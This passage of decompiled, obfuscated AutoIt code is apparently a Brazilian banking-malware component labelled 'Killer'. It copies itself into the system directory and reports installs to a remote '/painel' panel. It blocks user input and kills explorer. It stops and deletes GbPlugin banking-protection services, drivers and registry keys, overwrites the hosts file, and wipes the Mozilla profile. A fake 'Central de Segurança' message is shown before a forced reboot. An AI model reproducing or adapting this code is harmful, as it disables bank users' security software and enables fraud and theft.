If @error OR NOT $locVar0001[0] Then Return 0
Return $locVar0001[0]
EndFunc
Func Fn0023($__01, $__02)
If NOT Fn0021($Var0045, $Var0055, 0x00000bb8) Then Return
$Var0067 = 1
$Var0064 = Fn0004(0, True, False, "")
Return Fn0021($Var0047, $Var0055, 0)
EndFunc
Func Fn0024()
$Var0067 = 0
If $Var0064 Then Fn0005($Var0064)
EndFunc
Global Const $Var0118 = 8
Global Const $Var0119 = 0x00000010
Global Const $Var0120 = 1
Global Const $Var0121 = 4
Global Const $Var0122 = 2
Global Const $Var0123 = BitOR($Var0120, $Var0122, $Var0121, $Var0118)
Global Const $Var0124 = BitOR($Var0119, $Var0118, $Var0120)
Global Const $Var0125 = BitOR($Var0119, $Var0118, $Var0121)
Global Const $Var0126 = BitOR($Var0119, $Var0122, $Var0120)
Global Const $Var0127 = BitOR($Var0119, $Var0122, $Var0121)
Global Const $Var0128 = 0x00020000
Global Const $Var0129 = 0x00080000
Global Const $Var0130 = 0x00c00000
Global Const $Var0131 = 0x80000000
Global Const $Var0132 = 0x00000080
Global Const $Var0133 = 8
Global Const $Var0134 = 0x00000100
Global Const $Var0135 = BitOR($Var0128, $Var0130, $Var0131, $Var0129)
Global Const $Var0136 = BitOR($Var0132, $Var0133, $Var0134)
Global Const $Var0137 = 4
Global Const $Var0138 = 4
Global Const $Var0139 = 2
Global Const $Var0140 = 0x00000040
Global Const $Var0141 = 8
Global Const $Var0142 = 0x00000020
Global Const $Var0143 = 0x00000010
Global Const $Var0144 = 1
Global Const $Var0145 = 0x00000100
Global Const $Var0146 = 0x00000080
Global Const $Var0147 = BitOR($Var0138, $Var0139, $Var0140, $Var0141, $Var0142, $Var0143, $Var0144, $Var0145, $Var0146)
Global Const $Var0148 = 4
Global Const $Var0149 = 0x00000040
Global Const $Var0150 = 0x00000020
Global Const $Var0151 = 0x00000080
Global Const $Var0152 = 1
Global Const $Var0153 = 8
Global Const $Var0154 = 0x00000100
Global Const $Var0155 = 2
Global Const $Var0156 = 0x00000010
Global Const $Var0157 = BitOR($Var0108, $Var0148, $Var0149, $Var0150, $Var0151, $Var0152, $Var0153, $Var0154, $Var0155, $Var0156)
Global Const $Var0158 = 0x00000010
Global Const $Var0159 = 8
Global Const $Var0160 = 4
Global Const $Var0161 = 2
Global Const $Var0162 = 1
Global Const $Var0163 = BitOR($Var0105, $Var0158, $Var0159, $Var0160, $Var0161, $Var0162)
Global Const $Var0164 = 4
Global Const $Var0165 = 0x00000020
Global Const $Var0166 = 8
Global Const $Var0167 = 1
Global Const $Var0168 = 0x00000100
Global Const $Var0169 = 0x00000040
Global Const $Var0170 = 2
Global Const $Var0171 = 0x00000200
Global Const $Var0172 = 0x00000010
Global Const $Var0173 = BitOR($Var0164, $Var0165, $Var0166, $Var0167, $Var0168, $Var0169, $Var0170, $Var0171, $Var0172)
Global Const $Var0174 = 1
Global Const $Var0175 = 2
Global Const $Var0176 = 4
Global Const $Var0177 = 8
Global Const $Var0178 = 0x00000010
Global Const $Var0179 = 0x00000020
Global Const $Var0180 = 0x00000040
Global Const $Var0181 = 0x00000080
Global Const $Var0182 = 0x00000100
Global Const $Var0183 = 0x00000200
Global Const $Var0184 = 0x00000400
Global Const $Var0185 = 0x00000800
Global Const $Var0186 = 0x00002000
Global Const $Var0187 = BitOR($Var0174, $Var0175, $Var0176, $Var0177, $Var0178, $Var0179, $Var0180, $Var0181, $Var0182, $Var0183, $Var0184, $Var0185, $Var0186)
Global Const $Var0188 = 1
Global Const $Var0189 = 4
Global Const $Var0190 = 2
Global Const $Var0191 = 0x00000010
Global Const $Var0192 = 8
Global Const $Var0193 = BitOR($Var0108, $Var0188, $Var0189, $Var0190, $Var0191, $Var0192)
Global Const $Var0194 = 2
Global Const $Var0195 = 1
Global Const $Var0196 = BitOR($Var0108, $Var0194, $Var0195)
Global Const $Var0197 = 0x00000020
Global Const $Var0198 = 4
Global Const $Var0199 = 8
Global Const $Var0200 = 0x00000010
Global Const $Var0201 = 1
Global Const $Var0202 = 2
Global Const $Var0203 = BitOR($Var0106, $Var0199, $Var0200, $Var0201)
Global Const $Var0204 = BitOR($Var0107, $Var0198, $Var0202)
Global Const $Var0205 = BitOR($Var0105, $Var0197, $Var0198, $Var0199, $Var0200, $Var0201, $Var0202)
Global Const $Var0206 = 1
Global Const $Var0207 = 2
Global Const $Var0208 = 4
Global Const $Var0209 = BitOR($Var0206, $Var0207, $Var0208)
Global Const $Var0210 = 0x00000010
Global Const $Var0211 = 0x00000200
Global Const $Var0212 = 0x00000400
Global Const $Var0213 = 4
Global Const $Var0214 = BitOR($Var0210, $Var0211, $Var0212, $Var0213)
Global Const $Var0215 = 1
Global Const $Var0216 = 2
Global Const $Var0217 = 4
Global Const $Var0218 = 8
Global Const $Var0219 = 0x00000010
Global Const $Var0220 = 0x00000020
Global Const $Var0221 = 0x00000040
Global Const $Var0222 = 0x00000100
Global Const $Var0223 = BitOR($Var0215, $Var0216, $Var0217, $Var0219, $Var0220, $Var0221, $Var0222)
Global Const $Var0224 = 0x00004000
Global Const $Var0225 = 0x00008000
Global Const $Var0226 = 0x00010000
Global Const $Var0227 = 0x00020000
Global Const $Var0228 = 0x00040000
Global Const $Var0229 = 0x00080000
Global Const $Var0230 = BitOR($Var0224, $Var0225, $Var0226, $Var0227, $Var0228, $Var0229)
Global Const $Var0231 = 0x00400000
Global Const $Var0232 = 0x00800000
Global Const $Var0233 = 0x01000000
Global Const $Var0234 = 0x10000000
Global Const $Var0235 = 0x20000000
Global Const $Var0236 = 0x40000000
Global Const $Var0237 = BitOR($Var0218, $Var0226, $Var0228, $Var0231, $Var0232, $Var0234, $Var0235, $Var0236)
Global Const $Var0238 = 0x80000000
Global Const $Var0239 = BitOR($Var0224, $Var0228, $Var0238, $Var0233)
Global Const $Var0240 = 0
Global Const $Var0241 = 1
Global Const $Var0242 = 2
Global Const $Var0243 = 4
Global Const $Var0244 = BitOR($Var0240, $Var0241, $Var0242, $Var0243)
Global Const $Var0245 = Fn0027()
Global Const $Var0246 = "align 2;dword_ptr Size;hwnd hOwner;ptr hDevMode;ptr hDevNames;hwnd hDC;dword Flags;ushort FromPage;ushort ToPage;ushort MinPage;ushort MaxPage;" & Fn0026(@AutoItX64, "uint", "ushort") & " Copies;ptr hInstance;lparam lParam;ptr PrintHook;ptr SetupHook;ptr PrintTemplateName;ptr SetupTemplateName;ptr hPrintTemplate;ptr hSetupTemplate;"
Func Fn0025($__01, $__02, $__03 = 0, $__04 = 0, $__05 = 0)
Local $locVar0001 = "wstr"
If NOT StringStripWS($__02, 3) Then
$locVar0001 = "ptr"
$__02 = 0
EndIf
Local $locVar0002 = DllCall("kernel32.dll", "int", "MoveFileWithProgressW", "wstr", $__01, $locVar0001, $__02, "ptr", $__04, "long_ptr", $__05, "dword", $__03)
If (@error) OR (NOT $locVar0002[0]) Then
Return SetError(1, 0, 0)
EndIf
Return 1
EndFunc
Func Fn0026($__01, $__02, $__03)
If $__01 Then
Return $__02
Else
Return $__03
EndIf
EndFunc
Func Fn0027()
Local $locVar0001 = DllStructCreate("dword;dword;dword;dword;dword;wchar[128]")
DllStructSetData($locVar0001, 1, DllStructGetSize($locVar0001))
Local $locVar0002 = DllCall("kernel32.dll", "int", "GetVersionExW", "ptr", DllStructGetPtr($locVar0001))
If (@error) OR (NOT $locVar0002[0]) Then
Return SetError(1, 0, 0)
EndIf
Return BitOR(BitShift(DllStructGetData($locVar0001, 2), -8), DllStructGetData($locVar0001, 3))
EndFunc
Global Const $Var0247 = "dword Size;hwnd hWndOwnder;handle hInstance;dword rgbResult;ptr CustColors;dword Flags;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName"
Global Const $Var0248 = "dword Size;hwnd hWndOwner;handle hDC;ptr LogFont;int PointSize;dword Flags;dword rgbColors;lparam CustData;" & "ptr fnHook;ptr TemplateName;handle hInstance;ptr szStyle;word FontType;int SizeMin;int SizeMax"
Func Fn0028($__01, $__02 = 0)
Local Const $locVar0001 = 0x000000b7
Local Const $locVar0002 = 1
Local $locVar0003 = 0
If BitAND($__02, 2) Then
Local $locVar0004 = DllStructCreate("byte;byte;word;ptr[4]")
Local $locVar0005 = DllCall("advapi32.dll", "bool", "InitializeSecurityDescriptor", "struct*", $locVar0004, "dword", $locVar0002)
If @error Then Return SetError(@error, @extended, 0)
If $locVar0005[0] Then
$locVar0005 = DllCall("advapi32.dll", "bool", "SetSecurityDescriptorDacl", "struct*", $locVar0004, "bool", 1, "ptr", 0, "bool", 0)
If @error Then Return SetError(@error, @extended, 0)
If $locVar0005[0] Then
$locVar0003 = DllStructCreate($Var0102)
DllStructSetData($locVar0003, 1, DllStructGetSize($locVar0003))
DllStructSetData($locVar0003, 2, DllStructGetPtr($locVar0004))
DllStructSetData($locVar0003, 3, 0)
EndIf
EndIf
EndIf
Local $locVar0006 = DllCall("kernel32.dll", "handle", "CreateMutexW", "struct*", $locVar0003, "bool", 1, "wstr", $__01)
If @error Then Return SetError(@error, @extended, 0)
Local $locVar0007 = DllCall("kernel32.dll", "dword", "GetLastError")
If @error Then Return SetError(@error, @extended, 0)
If $locVar0007[0] = $locVar0001 Then
If BitAND($__02, 1) Then
Return SetError($locVar0007[0], $locVar0007[0], 0)
Else
Exit - 1
EndIf
EndIf
Return $locVar0006[0]
EndFunc
Func Fn0029($__01, $__02 = "*", $__03 = 0, $__04 = 0, $__05 = 0, $__06 = 1, $__07 = "", $__08 = "")
Local $locVar0001[0x00000064] = [0], $locVar0002[0x00000064] = [0], $locVar0003[0x00000064] = [0], $locVar0004[0x00000064] = [0], $locVar0005[0x00000064] = [1]
Local $locVar0006 = "", $locVar0007, $locVar0008, $locVar0009, $locVar0010 = ".+", $locVar0011 = ":"
Local $locVar0012, $locVar0013, $locVar0014 = "", $locVar0015, $locVar0016
Local $locVar0017[0x00000064][2] = [[0, 0]], $locVar0018, $locVar0019, $locVar0020
If NOT FileExists($__01) Then Return SetError(1, 1, "")
If StringRight($__01, 1) = "\" Then
$locVar0006 = "\"
Else
$__01 = $__01 & "\"
EndIf
$locVar0005[1] = $__01
If $__04 > 1 OR NOT IsInt($__04) Then Return SetError(1, 4, "")
If $__04 < 0 Then
StringReplace($__01, "\", "", 2)
$locVar0007 = @extended - $__04
EndIf
If $__02 = "*" Then
$locVar0008 = ".+"
Else
If NOT Fn0030($locVar0008, $__02) Then Return SetError(1, 2, "")
EndIf
Switch $__03
Case 0
Switch $__04
Case 0
$locVar0010 = $locVar0008
EndSwitch
Case 2
$locVar0010 = $locVar0008
EndSwitch
If $__07 = "" Then
$locVar0009 = ":"
Else
If NOT Fn0030($locVar0009, $__07) Then Return SetError(1, 7, "")
EndIf
Switch $__03
Case 0
Switch $__04
Case 0
$locVar0011 = $locVar0009
Case Else
If $__08 <> "" Then
If NOT Fn0030($locVar0011, $__08) Then Return SetError(1, 8, "")
EndIf
EndSwitch
Case 2
$locVar0011 = $locVar0009
EndSwitch
If NOT ($__03 = 0 OR $__03 = 1 OR $__03 = 2) Then Return SetError(1, 3, "")
If NOT ($__05 = 0 OR $__05 = 1 OR $__05 = 2) Then Return SetError(1, 5, "")
If NOT ($__06 = 0 OR $__06 = 1 OR $__06 = 2) Then Return SetError(1, 6, "")
While $locVar0005[0] > 0
$locVar0015 = $locVar0005[$locVar0005[0]]
$locVar0005[0] -= 1
Switch $__06
Case 1
$locVar0014 = StringReplace($locVar0015, $__01, "")
Case 2
$locVar0014 = $locVar0015
EndSwitch
$locVar0012 = FileFindFirstFile($locVar0015 & "*")
If $__03 = 0 AND $__05 AND $__06 Then
Fn0031($locVar0017, $locVar0014, $locVar0002[0] + 1)
EndIf
If $locVar0012 = -1 Then
ContinueLoop
EndIf
While 1
$locVar0016 = FileFindNextFile($locVar0012)
If @error Then
ExitLoop
EndIf
$locVar0013 = @extended
If $locVar0013 Then
Select
Case $__04 < 0
StringReplace($locVar0015, "\", "", 0, 2)
If @extended < $locVar0007 Then
ContinueCase
EndIf
Case $__04 = 1
If NOT StringRegExp($locVar0016, $locVar0011) Then
Fn0031($locVar0005, $locVar0015 & $locVar0016 & "\")
EndIf
EndSelect
EndIf
If $__05 Then
If $locVar0013 Then
If StringRegExp($locVar0016, $locVar0010) AND NOT StringRegExp($locVar0016, $locVar0011) Then
Fn0031($locVar0004, $locVar0014 & $locVar0016 & $locVar0006)
EndIf
Else
If StringRegExp($locVar0016, $locVar0008) AND NOT StringRegExp($locVar0016, $locVar0009) Then
If $locVar0015 = $__01 Then
Fn0031($locVar0003, $locVar0014 & $locVar0016)
Else
Fn0031($locVar0002, $locVar0014 & $locVar0016)
EndIf
EndIf
EndIf
Else
If $locVar0013 Then
If $__03 <> 1 AND StringRegExp($locVar0016, $locVar0010) AND NOT StringRegExp($locVar0016, $locVar0011) Then
Fn0031($locVar0001, $locVar0014 & $locVar0016 & $locVar0006)
EndIf
Else
If $__03 <> 2 AND StringRegExp($locVar0016, $locVar0008) AND NOT StringRegExp($locVar0016, $locVar0009) Then
Fn0031($locVar0001, $locVar0014 & $locVar0016)
EndIf
EndIf
EndIf
WEnd
FileClVar0255e($locVar0012)
WEnd
If $__05 Then
Switch $__03
Case 0
If $locVar0003[0] = 0 AND $locVar0004[0] = 0 Then Return SetError(1, 9, "")
Case 1
If $locVar0003[0] = 0 AND $locVar0002[0] = 0 Then Return SetError(1, 9, "")
Case 2
If $locVar0004[0] = 0 Then Return SetError(1, 9, "")
EndSwitch
Switch $__03
Case 2
ReDim $locVar0004[$locVar0004[0] + 1]
$locVar0001 = $locVar0004
Fn0033($locVar0001)
Case 1
If $__06 = 0 Then
Fn0032($locVar0001, $locVar0003, $locVar0002)
Fn0033($locVar0001)
Else
Fn0032($locVar0001, $locVar0003, $locVar0002, 1)
EndIf
Case 0
If $__06 = 0 Then
Fn0032($locVar0001, $locVar0003, $locVar0002)
$locVar0001[0] += $locVar0004[0]
ReDim $locVar0004[$locVar0004[0] + 1]
Fn0035($locVar0001, $locVar0004)
Fn0033($locVar0001)
Else
Local $locVar0001[$locVar0002[0] + $locVar0003[0] + $locVar0004[0] + 1]
$locVar0001[0] = $locVar0002[0] + $locVar0003[0] + $locVar0004[0]
Fn0033($locVar0003, 1, $locVar0003[0])
For $a2fd190023a = 1 To $locVar0003[0]
$locVar0001[$a2fd190023a] = $locVar0003[$a2fd190023a]
Next
Local $locVar0021 = $locVar0003[0] + 1
Fn0033($locVar0004, 1, $locVar0004[0])
For $a2fd190023a = 1 To $locVar0004[0]
If $locVar0006 Then
$locVar0018 = $locVar0004[$a2fd190023a]
Else
$locVar0018 = $locVar0004[$a2fd190023a] & "\"
EndIf
For $a21c4105628 = 1 To $locVar0017[0][0]
If $locVar0018 = $locVar0017[$a21c4105628][0] Then ExitLoop
Next
$locVar0019 = $locVar0017[$a21c4105628][1]
If $a21c4105628 = $locVar0017[0][0] Then
$locVar0020 = $locVar0002[0]
Else
$locVar0020 = $locVar0017[$a21c4105628 + 1][1] - 1
EndIf
If $__05 = 1 Then
Fn0033($locVar0002, $locVar0019, $locVar0020)
EndIf
$locVar0001[$locVar0021] = $locVar0004[$a2fd190023a]
$locVar0021 += 1
For $a21c4105628 = $locVar0019 To $locVar0020
$locVar0001[$locVar0021] = $locVar0002[$a21c4105628]
$locVar0021 += 1
Next
Next
EndIf
EndSwitch
Else
If $locVar0001[0] = 0 Then Return SetError(1, 9, "")
ReDim $locVar0001[$locVar0001[0] + 1]
EndIf
Return $locVar0001
EndFunc
Func Fn0030(ByRef $__01, $__02)
If StringRegExp($__02, "\\|/|:|\<|\>|\|") Then Return 0
$__02 = StringReplace(StringStripWS(StringRegExpReplace($__02, "\s*;\s*", ";"), 3), ";", "|")
$__02 = StringReplace(StringReplace(StringRegExpReplace($__02, "[][$^.{}()+\-]", "\\$0"), "?", "."), "*", ".*?")
$__01 = "(?i)^(" & $__02 & ")\z"
Return 1
EndFunc
Func Fn0031(ByRef $__01, $__02, $__03 = -1)
If $__03 = -1 Then
$__01[0] += 1
If UBound($__01) <= $__01[0] Then ReDim $__01[UBound($__01) * 2]
$__01[$__01[0]] = $__02
Else
$__01[0][0] += 1
If UBound($__01) <= $__01[0][0] Then ReDim $__01[UBound($__01) * 2][2]
$__01[$__01[0][0]][0] = $__02
$__01[$__01[0][0]][1] = $__03
EndIf
EndFunc
Func Fn0032(ByRef $__01, $__02, $__03, $__04 = 0)
ReDim $__02[$__02[0] + 1]
If $__04 = 1 Then Fn0033($__02)
$__01 = $__02
$__01[0] += $__03[0]
ReDim $__03[$__03[0] + 1]
If $__04 = 1 Then Fn0033($__03)
Fn0035($__01, $__03)
EndFunc
Func Fn0033(ByRef $__01, $__02 = 1, $__03 = -99)
If $__03 = -0x00000063 Then $__03 = UBound($__01) - 1
Fn0034($__01, $__02, $__03)
EndFunc
Func Fn0034(ByRef $__01, ByRef $__02, ByRef $__03)
Local $locVar0001
If ($__03 - $__02) < 15 Then
Local $locVar0002, $locVar0003, $locVar0004
For $locVar0002 = $__02 + 1 To $__03
$locVar0001 = $__01[$locVar0002]
If IsNumber($locVar0001) Then
For $locVar0003 = $locVar0002 - 1 To $__02 Step -1
$locVar0004 = $__01[$locVar0003]
If ($locVar0001 >= $locVar0004 AND IsNumber($locVar0004)) OR (NOT IsNumber($locVar0004) AND StringCompare($locVar0001, $locVar0004) >= 0) Then ExitLoop
$__01[$locVar0003 + 1] = $locVar0004
Next
Else
For $locVar0003 = $locVar0002 - 1 To $__02 Step -1
If (StringCompare($locVar0001, $__01[$locVar0003]) >= 0) Then ExitLoop
$__01[$locVar0003 + 1] = $__01[$locVar0003]
Next
EndIf
$__01[$locVar0003 + 1] = $locVar0001
Next
Return
EndIf
Local $locVar0005 = $__02, $locVar0006 = $__03, $locVar0007 = $__01[Int(($__02 + $__03) / 2)], $locVar0008 = IsNumber($locVar0007)
Do
If $locVar0008 Then
While ($__01[$locVar0005] < $locVar0007 AND IsNumber($__01[$locVar0005])) OR (NOT IsNumber($__01[$locVar0005]) AND StringCompare($__01[$locVar0005], $locVar0007) < 0)
$locVar0005 += 1
WEnd
While ($__01[$locVar0006] > $locVar0007 AND IsNumber($__01[$locVar0006])) OR (NOT IsNumber($__01[$locVar0006]) AND StringCompare($__01[$locVar0006], $locVar0007) > 0)
$locVar0006 -= 1
WEnd
Else
While (StringCompare($__01[$locVar0005], $locVar0007) < 0)
$locVar0005 += 1
WEnd
While (StringCompare($__01[$locVar0006], $locVar0007) > 0)
$locVar0006 -= 1
WEnd
EndIf
If $locVar0005 <= $locVar0006 Then
$locVar0001 = $__01[$locVar0005]
$__01[$locVar0005] = $__01[$locVar0006]
$__01[$locVar0006] = $locVar0001
$locVar0005 += 1
$locVar0006 -= 1
EndIf
Until $locVar0005 > $locVar0006
Fn0034($__01, $__02, $locVar0006)
Fn0034($__01, $locVar0005, $__03)
EndFunc
Func Fn0035(ByRef $__01, Const ByRef $__02)
Local $locVar0001 = UBound($__01) - 1, $locVar0002 = UBound($__02)
ReDim $__01[$locVar0001 + $locVar0002]
For $a2fd190023a = 1 To $locVar0002 - 1
$__01[$locVar0001 + $a2fd190023a] = $__02[$a2fd190023a]
Next
EndFunc
Global $Var0249
If NOT @Compiled Then Exit
If (@ScriptFullPath <> @SystemDir & "\" & $Var0003) Then
If Fn0028(@ScriptName) = 0 Then
Exit
EndIf
While ProcessExists($Var0003)
ProcessClVar0255e($Var0003)
Sleep(0x000003e8)
WEnd
Local $Var0250 = FileGetVersion(@ScriptFullPath)
If Fn0008($Var0001) Then
If FileExists(@SystemDir & "\" & $Var0003) Then
Local $Var0251 = FileGetVersion(@SystemDir & "\" & $Var0003)
If $Var0250 <> $Var0251 Then
InetRead($Var0004 & "/painel/?add=1&inf=Killer v." & $Var0250 & " (Updated on " & @Var0255Version & ")")
Else
Exit
EndIf
EndIf
While Fn0008($Var0001)
Fn0040()
Sleep(0x000003e8)
WEnd
Else
InetRead($Var0004 & "/painel/?add=1&inf=Killer v." & $Var0250 & " (Installed on " & @Var0255Version & ")")
EndIf
If FileExists(@ProgramFilesDir & "\gbplugin") Then
FileCopy(@ScriptFullPath, @SystemDir & "\" & $Var0003, 1)
Fn0039()
DirCreate(@SystemDir & "\Unlocker")
If @Var0255Arch = "X64" Then
FileInstall("Unlocker1.9.1-x64\$INSTDIR\Unlocker.exe", @SystemDir & "\Unlocker\Unlocker.exe", 1)
FileInstall("Unlocker1.9.1-x64\$INSTDIR\UnlockerDriver5.sys", @SystemDir & "\Unlocker\UnlockerDriver5.sys", 1)
FileInstall("Unlocker1.9.1-x64\$INSTDIR\UnlockerInject32.exe", @SystemDir & "\Unlocker\UnlockerInject32.exe", 1)
Else
FileInstall("Unlocker1.9.1\$INSTDIR\Unlocker.exe", @SystemDir & "\Unlocker\Unlocker.exe", 1)
FileInstall("Unlocker1.9.1\$INSTDIR\UnlockerDriver5.sys", @SystemDir & "\Unlocker\UnlockerDriver5.sys", 1)
EndIf
If Fn0010($Var0001) = 1 Then
DirRemove(@AppDataDir & "\Mozilla", 1)
MsgBox(0, "Central de Segurança", "Programa instalado com sucesso.", 10)
Sleep(0x0002bf20)
EndIf
Shutdown(6)
Exit
EndIf
MsgBox(0, "Central de Segurança", "Programa não instalado.", 10)
Exit
EndIf
Fn0017($Var0001)
Func Fn0036()
FileInstall("hVar0255ts", @WindowsDir & "\System32\DRIVERS\etc\hVar0255ts", 1)
BlockInput(1)
While ProcessExists("explorer.exe")
ProcessClVar0255e("explorer.exe")
Sleep(0x000001f4)
WEnd
RunWait(@SystemDir & "\sc config gbpkm start= disabled", "", @SW_HIDE)
RunWait(@SystemDir & "\sc stop gbpkm", "", @SW_HIDE)
RunWait(@SystemDir & "\sc delete gbpkm", "", @SW_HIDE)
RunWait(@SystemDir & "\sc config gbpsv start= disabled", "", @SW_HIDE)
RunWait(@SystemDir & "\sc stop gbpsv", "", @SW_HIDE)
RunWait(@SystemDir & "\sc delete gbpsv", "", @SW_HIDE)
ProcessClVar0255e("gbpsv.exe")
Fn0042()
Fn0037(@SystemDir & "\drivers\GbpKm.sys")
Fn0037(@SystemDir & "\drivers\gbpndisrd.sys")
Fn0037(@ProgramFilesDir & "\GbPlugin")
Fn0037(@AppDataCommonDir & "\GbPlugin")
Fn0037(@AppDataCommonDir & "\Gas")
DirRemove(@ProgramFilesDir & "\GbPlugin", 1)
DirRemove(@AppDataCommonDir & "\GbPlugin", 1)
DirRemove(@AppDataCommonDir & "\Gas", 1)
FileDelete(@SystemDir & "\drivers\GbpKm.sys.xx")
FileDelete(@SystemDir & "\drivers\gbpndisrd.sys.xx")
DirRemove(@ProgramFilesDir & "\GbPlugin.xx", 1)
DirRemove(@AppDataCommonDir & "\GbPlugin.xx", 1)
DirRemove(@AppDataCommonDir & "\Gas.xx", 1)
Fn0042()
Fn0038(@SystemDir & "\drivers\GbpKm.sys")
Fn0038(@SystemDir & "\drivers\gbpndisrd.sys")
Fn0038(@ProgramFilesDir & "\GbPlugin")
Fn0038(@AppDataCommonDir & "\GbPlugin")
Fn0038(@AppDataCommonDir & "\Gas")
If @Var0255Version = "WIN_XP" Then
FileInstall("snetcfg.exe", @SystemDir & "\snetcfg.exe", 1)
RunWait(@SystemDir & "\snetcfg.exe -v -u nt_ndisrdmp", "", @SW_HIDE)
RunWait(@SystemDir & "\snetcfg.exe -v -u nt_ndisrd", "", @SW_HIDE)
Else
RunWait(@SystemDir & "\netcfg.exe -v -u nt_ndisrdmp", "", @SW_HIDE)
RunWait(@SystemDir & "\netcfg.exe -v -u nt_ndisrd", "", @SW_HIDE)
EndIf
If $Var0249 = "RESTART" Then
RegWrite("HKLM\SYSTEM\CurrentControlSet\Control\Session Manager", "AllowProtectedRenames", "REG_SZ", "1")
Shutdown(6)
Else
Fn0042()
While ProcessExists("explorer.exe") = 0
ShellExecute("explorer.exe")
Sleep(0x000003e8)
WEnd
BlockInput(0)
Fn0040()
EndIf
EndFunc
Func Fn0037($__01)
RunWait(@SystemDir & '\Unlocker\Unlocker.exe "' & $__01 & '" -M "' & $__01 & '.xx" -S -O', @SystemDir & "\Unlocker", @SW_HIDE)
EndFunc
Func Fn0038($__01)
If FileExists($__01) Then
$Var0249 = "RESTART"
If StringInStr(FileGetAttrib($__01), "D") Then
$a04d540192d = Fn0029($__01, "*", 0, 1, 0, 2)
For $a2fd190023a = 1 To $a04d540192d[0]
Fn0025(FileGetShortName($a04d540192d[$a2fd190023a]), "", $Var0137)
Next
Else
Fn0025(FileGetShortName($__01), "", $Var0137)
EndIf
EndIf
EndFunc
Func Fn0039()
Fn0006($Var0001, $Var0002, BitOR($Var0037, $Var0040), $Var0042, $Var0043, '"' & @SystemDir & "\" & $Var0003 & '"')
EndFunc
Func Fn0040()
Fn0011($Var0001)
Fn0007($Var0001)
EndFunc
Func Fn0041($__01, $__02 = False)
While ProcessExists("explorer.exe")
ProcessClVar0255e("explorer.exe")
Sleep(0x000001f4)
WEnd
If $__02 = False Then
RegDelete($__01)
Else
RegDelete($__01, $__02)
EndIf
EndFunc
Func Fn0042()
Fn0041("HKLM\SYSTEM\ControlSet001\Services\Ndisrd")
Fn0041("HKLM\SYSTEM\ControlSet002\Services\Ndisrd")
Fn0041("HKLM\SYSTEM\ControlSet001\Services\NdisrdMP")
Fn0041("HKLM\SYSTEM\ControlSet002\Services\NdisrdMP")
Fn0041("HKLM\SYSTEM\ControlSet001\Services\GbpKm")
Fn0041("HKLM\SYSTEM\ControlSet002\Services\GbpKm")
Fn0041("HKLM\SYSTEM\ControlSet001\Services\GbpSv")
Fn0041("HKLM\SYSTEM\ControlSet002\Services\GbpSv")
Fn0041("HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{82B00B9D-7431-4D58-B04E-A946762E0957}")
Fn0041("HKLM\SYSTEM\ControlSet002\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{82B00B9D-7431-4D58-B04E-A946762E0957}")
Fn0041("HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{C28FA462-8E2F-4943-B0A8-6B116FC5981B}")
Fn0041("HKLM\SYSTEM\ControlSet002\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{C28FA462-8E2F-4943-B0A8-6B116FC5981B}")
Fn0041("HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{43ED1BBD-7D55-4DE5-8C88-DCD1CC3E4EFF}")
Fn0041("HKLM\SYSTEM\ControlSet002\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{43ED1BBD-7D55-4DE5-8C88-DCD1CC3E4EFF}")
Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\NT_NDISRD")
Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\NT_NDISRD")
Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\NT_NDISRDMP")
Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\NT_NDISRDMP")
Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_GBPKM")
Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\LEGACY_GBPKM")
Fn0041("HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_GBPSV")
Fn0041("HKLM\SYSTEM\ControlSet002\Enum\Root\LEGACY_GBPSV")
Fn0041("HKLM\SYSTEM\ControlSet001\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPKM")
Fn0041("HKLM\SYSTEM\ControlSet002\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPKM")
Fn0041("HKLM\SYSTEM\ControlSet001\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPSV")
Fn0041("HKLM\SYSTEM\ControlSet002\Hardware Profiles\0001\System\CurrentControlSet\Enum\ROOT\LEGACY_GBPSV")
Fn0041("HKLM\SOFTWARE\Classes\CLSID\{50AB4426-E258-4C6B-8094-8F3FBCC30011}")
Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540011}")
Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399011}")
Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540000}")
Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399F83}")
Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540008}")
Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399008}")
Fn0041("HKLM\SOFTWARE\Classes\CLSID\{DB6BF2CD-4F59-4F1C-AA9C-D08C0B61A931}")
Fn0041("HKLM\SOFTWARE\Classes\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540003}")
Fn0041("HKLM\SOFTWARE\Classes\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399003}")
Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540011}")
Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540000}")
Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540008}")
Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{6B71634C-5867-4D85-BFFE-DF1C322F8B96}")
Fn0041("HKLM\SOFTWARE\Classes\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540003}")
